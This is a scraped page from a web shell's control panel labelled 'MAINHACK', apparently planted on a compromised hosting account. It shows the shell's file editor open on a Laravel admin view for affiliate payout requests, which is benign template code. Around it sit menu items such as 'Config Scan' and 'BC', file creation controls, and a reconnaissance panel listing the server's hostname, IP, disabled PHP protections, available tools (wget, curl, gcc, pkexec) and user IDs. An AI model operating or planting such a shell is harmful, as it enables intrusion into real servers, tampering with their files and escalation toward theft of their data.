[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: 5581850d27f06a7da4d547ce78c589a8.php
<?php $__env->startSection('content'); ?> <div class="row"> <div class="col-lg-12"> <div class="card"> <div class="card-header d-flex align-items-center justify-content-between"> <span class="panel-title"><?php echo e(_lang('Payout Requests')); ?></span> <select class="filter-select select-status auto-select" data-selected="<?php echo e($type); ?>" name="status"> <option value="pending"><?php echo e(_lang('Pending')); ?></option> <option value="approved"><?php echo e(_lang('Approved')); ?></option> <option value="cancelled"><?php echo e(_lang('Cancelled')); ?></option> </select> </div> <div class="card-body"> <div class="table-responsive"> <table id="referral_payouts_table" class="table"> <thead> <tr> <th><?php echo e(_lang('Date')); ?></th> <th><?php echo e(_lang('User')); ?></th> <th><?php echo e(_lang('Payout Method')); ?></th> <th><?php echo e(_lang('Amount')); ?></th> <th><?php echo e(_lang('Charge')); ?></th> <th><?php echo e(_lang('Final Amount')); ?></th> <th><?php echo e(_lang('Status')); ?></th> <th class="text-center"><?php echo e(_lang('Action')); ?></th> </tr> </thead> <tbody> <?php $__currentLoopData = $referralPayouts; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $referralPayout): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <tr data-id="row_<?php echo e($referralPayout->id); ?>"> <td class='created_at'><?php echo e($referralPayout->created_at); ?></td> <td class='user'><?php echo e($referralPayout->user->name); ?></td> <td class='affiliate_payout_method'><?php echo e($referralPayout->affiliate_payout_method->name); ?></td> <td class='amount'><?php echo e(decimalPlace($referralPayout->amount, currency_symbol())); ?></td> <td class='charge'>-<?php echo e(decimalPlace($referralPayout->charge, currency_symbol())); ?></td> <td class='final_amount'><?php echo e(decimalPlace($referralPayout->final_amount, currency_symbol())); ?></td> <td class='status'> <?php if($referralPayout->status == 0): ?> <?php echo xss_clean(show_status(_lang('Pending'), 'warning')); ?> <?php elseif($referralPayout->status == 1): ?> <?php echo xss_clean(show_status(_lang('Completed'), 'success')); ?> <?php else: ?> <?php echo xss_clean(show_status(_lang('Cancelled'), 'danger')); ?> <?php endif; ?> </td> <td class="text-center"> <a href="<?php echo e(route('affiliate.payout_request_details', $referralPayout->id)); ?>" class="btn btn-primary btn-xs"><?php echo e(_lang('Details')); ?></a> </td> </tr> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </tbody> </table> </div> <div class="pagination-container float-right"> <?php echo e($referralPayouts->links()); ?> </div> </div> </div> </div> </div> <?php $__env->stopSection(); ?> <?php $__env->startSection('js-script'); ?> <script> (function ($) { "use strict"; $(".select-status").on("change", function (e) { var status = $(this).val(); window.location.href = _url + "/admin/affiliate/payout_requests/" + status; }); })(jQuery); </script> <?php $__env->stopSection(); ?> <?php echo $__env->make('layouts.app', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/eliosofonline/public_html/resources/views/backend/admin/affiliate/payout_requests.blade.php ENDPATH**/ ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.97 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002